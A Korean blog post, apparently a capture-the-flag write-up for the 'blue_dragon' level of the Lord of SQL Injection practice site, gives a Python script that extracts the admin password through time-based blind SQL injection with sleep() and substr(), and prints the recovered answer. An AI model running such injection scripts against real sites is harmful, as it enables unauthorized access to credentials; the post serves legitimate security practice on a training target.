[Load of SQL Injection] blue

보안 공부/Load of SQL injection

[Load of SQL Injection] blue_dragon

sh1256 2022. 2. 16. 21:47

728x90

첫번째 쿼리문에서 result를 받은 후 '(홑따음표)를 필터링 한다. sleep()함수와 if문을 사용하자.

if문의 조건절이 참이면 5초간 시간을 끌게 만들었다.

import requests
import time
cookies={'PHPSESSID':'새션값'}
url ="https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php?id=admin&&pw="
length=8#pw는 8자리
pw= ""
min=time.time()
max=time.time()

for i in range(1, length+1):
    for j in range(33, 122):#문자범위
        min=time.time()
        #' or if(id='admin' and substr(pw,N,1)='?',sleep(5),1)#'
        search_str="' or if(id='admin' and substr(pw,"+str(i)+",1)='"+chr(j)+"',sleep(2),1)%23"
        #5초는 너무 길어서 2초로 바꿈
        print("search_str: "+search_str)
        response= requests.get(url+search_str, cookies=cookies)
        max=time.time()
        interval=max-min
        #print(response.text)
        
        if interval>1:
            pw+=chr(j)
            print("pw: "+pw)
            break

pw=D948B8A0 --d948b8a0

저작자표시 비영리 변경금지

'보안 공부 > Load of SQL injection' 카테고리의 다른 글

[Load of SQL Injection] red_dragon (0)	2022.02.16
[Load of SQL Injection] green_dragon (0)	2022.02.15
[Load of SQL Injection] evil_wizard (0)	2022.02.14
[Load of SQL Injection] hell fire (SQL order by) (0)	2022.02.14
[Load of SQL Injection] dark eyes (0)	2022.02.05

현재글[Load of SQL Injection] blue_dragon

웹해킹공부, LoadofSQLinjection, webhacking.kr, sqlInjection, Toeicspeaking, It, webhacking.kr44, 토익스피킹, 토익스피킹예시, 개발공부, IT공부, 해킹공부, SQL, 웹해킹, 영어공부, 보안공부, 해킹, 보안, toeic, 백준,

Today :
Yesterday :

살아가는 이야기

[Load of SQL Injection] blue_dragon

'보안 공부 > Load of SQL injection' 카테고리의 다른 글

'보안 공부/Load of SQL injection'의 다른글

티스토리툴바

« 2025/04 »
일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

[Load of SQL Injection] blue_dragon

'보안 공부 > Load of SQL injection' 카테고리의 다른 글

'보안 공부/Load of SQL injection'의 다른글

관련글

티스토리툴바